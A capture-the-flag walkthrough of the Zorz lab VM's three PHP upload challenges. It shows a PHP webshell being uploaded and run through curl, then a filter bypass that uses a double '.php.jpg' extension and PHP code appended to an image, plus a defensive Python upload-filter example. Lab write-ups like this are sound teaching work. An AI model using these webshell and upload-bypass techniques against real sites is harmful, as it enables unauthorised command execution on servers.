This VM contains 3 web application challenges, which focus on file upload and filter bypass.
Only ports 22 and 80 are open.
[email protected]:~# nmap -n -p- -A 192.168.56.102
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=4/9%Time=5526DEE1%P=x86_64-unknown-linux-gnu%r(
SF:NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Let’s head over to port 80 in a web browser.
I downloaded an image off the Internet and uploaded it to the server.
The file uploads, which is good, but now I need to find it…
/tmp/phpsu5a08 was not valid (404), as was /tmp/rastamouse.jpg. So now it’s time to break out the web fuzzers! I didn’t get any hits with my usual wfuzz wordlists, but I did with
The interesting directory is uploads2, though it turns out this is the directory for challenge 2. So I manually tried uploads1 and found
I took a copy of /usr/share/webshells/php/php-simple-backdoor.php and uploaded it as catflap1.php. This was uploaded successfully, so it seems this level has no filtering or protection in place at all.
[email protected]:~# curl http://192.168.56.102/uploads1/catflap1.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Attempting to upload the same PHP file for level 2 fails miserably.
If we intercept the request with Burp, we can see there’s a Content-Disposition header. Note the filename; we will change this later.
I sent the POST to Burp Repeater and tried various things to get PHP uploaded. After a few tries, I found that the following combination worked: injecting PHP code at the end of the image data and modifying the file extension (to force the server to process the PHP data).
Content-Disposition: form-data; name="upfile"; filename="rastamouse.php.jpg"
When you access the URL, the binary data for the image is displayed as gibberish, but at the very bottom the output of the PHP is shown.
[email protected]:~# curl http://192.168.56.102/uploads2/rastamouse.php.jpg
[email protected]:~# curl http://192.168.56.102/uploads2/rastamouse.php.jpg?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
To create the same file outside of Burp, it’s as simple as:
[email protected]:~/vulnhub/zorz/2# cat rastamouse.jpg catflap2.php > catflap2.php.jpg
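The two bypass ingredients above (PHP appended after the image bytes, and a `.php` token kept inside a name that still ends in `.jpg`) defeat an upload filter that only looks for an image-like extension somewhere in the name plus image magic bytes. The script below is an added example written for this writeup, not the Zorz uploader code or anything from the VM author; it contrasts such a weak filter with a hardened one. All names (`naive_check`, `hardened_check`, the constructed `CLEAN_JPEG` and `POLYGLOT` byte strings) are my own assumptions, and the appended marker is an inert `<?php ... ?>` tag rather than a shell. The hardened version rejects an executable token anywhere in a multi-extension name (the case Apache's mod_mime `AddHandler` mis-handles), rejects bytes trailing the image's own end-of-file marker, scans for a PHP open tag, and never stores the client-chosen filename.

```python
import re
import uuid
from pathlib import PurePosixPath

# Allowlist of final extensions and the magic bytes each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Byte sequence that terminates a well-formed file of each type (JPEG EOI,
# PNG IEND chunk tail, GIF trailer). Anything after it is not image data.
TRAILER = {
    "jpg": b"\xff\xd9",
    "jpeg": b"\xff\xd9",
    "png": b"IEND\xaeB`\x82",
    "gif": b"\x3b",
}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Tokens a PHP-enabled Apache may hand to the interpreter when they appear
# anywhere in a multi-extension name (mod_mime AddHandler behaviour).
EXECUTABLE_TOKENS = {"php", "phtml", "php3", "php4", "php5", "phar", "phps"}


def naive_check(filename: str, data: bytes) -> bool:
    """Weak filter of the kind the double-extension trick defeats (assumed):
    '.jpg' somewhere in the name plus image magic bytes is enough."""
    looks_like_image = any(
        data.startswith(m) for magics in ALLOWED.values() for m in magics
    )
    return ".jpg" in filename.lower() and looks_like_image


def hardened_check(filename: str, data: bytes):
    """Return (accepted, reason, stored_name); stored_name is server-chosen."""
    parts = PurePosixPath(filename).name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension", None
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed", None
    # Reject an executable token anywhere in the name, not just at the end.
    if EXECUTABLE_TOKENS & set(parts[:-1]):
        return False, "executable extension inside multi-extension name", None
    if not any(data.startswith(m) for m in ALLOWED[ext]):
        return False, "magic bytes do not match extension", None
    # Reject anything appended after the image's own end-of-file marker.
    end = data.rfind(TRAILER[ext])
    if end == -1 or data[end + len(TRAILER[ext]):].strip():
        return False, "trailing data after image end marker", None
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag inside file body", None
    # Never reuse the client-supplied name on disk.
    return True, "ok", f"{uuid.uuid4().hex}.{ext}"


# Constructed sample inputs: a minimal JPEG-shaped byte string (not a real
# photo) and the same bytes with an inert PHP marker concatenated on the end,
# mirroring `cat image.jpg code.php > image.php.jpg`.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
POLYGLOT = CLEAN_JPEG + b"<?php /* constructed marker */ ?>\n"

if __name__ == "__main__":
    for name, blob in [
        ("rastamouse.php.jpg", POLYGLOT),
        ("rastamouse.jpg", POLYGLOT),
        ("rastamouse.jpg", CLEAN_JPEG),
    ]:
        print(name, "naive:", naive_check(name, blob),
              "hardened:", hardened_check(name, blob)[:2])
```

Running it shows the naive filter passing `rastamouse.php.jpg` while the hardened one rejects it on the name alone, rejects the same bytes under an innocent `rastamouse.jpg` because of the trailing payload, and accepts only the clean image under a server-generated name. Renaming on the server is what removes the multi-extension problem entirely; the other checks are defence in depth for the case where the stored name is still derived from user input.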
It turns out that my file for Level 2 worked for Level 3 as well. That was easy ^_^.
So let’s collect the flag.
$ ls -l
drwxr-xr-x 2 root root 4096 Feb 18 22:45 l337saucel337
$ ls -l l337saucel337
-rw-r--r-- 1 root root 400 Feb 18 22:45 SECRETFILE
$ cat l337saucel337/SECRETFILE
Great job so far. This box has 3 uploaders. The first 2 are pure php, the last one is php w/jquery. To get credit for this challenge, please submit a write-up or instructions on how you compromised the uploader or uploaders. If you solve 1, 2, or all of the uploader challenges, feel free to shoot me an email and let me know! [email protected] Thanks for playing! http://www.top-hat-sec.com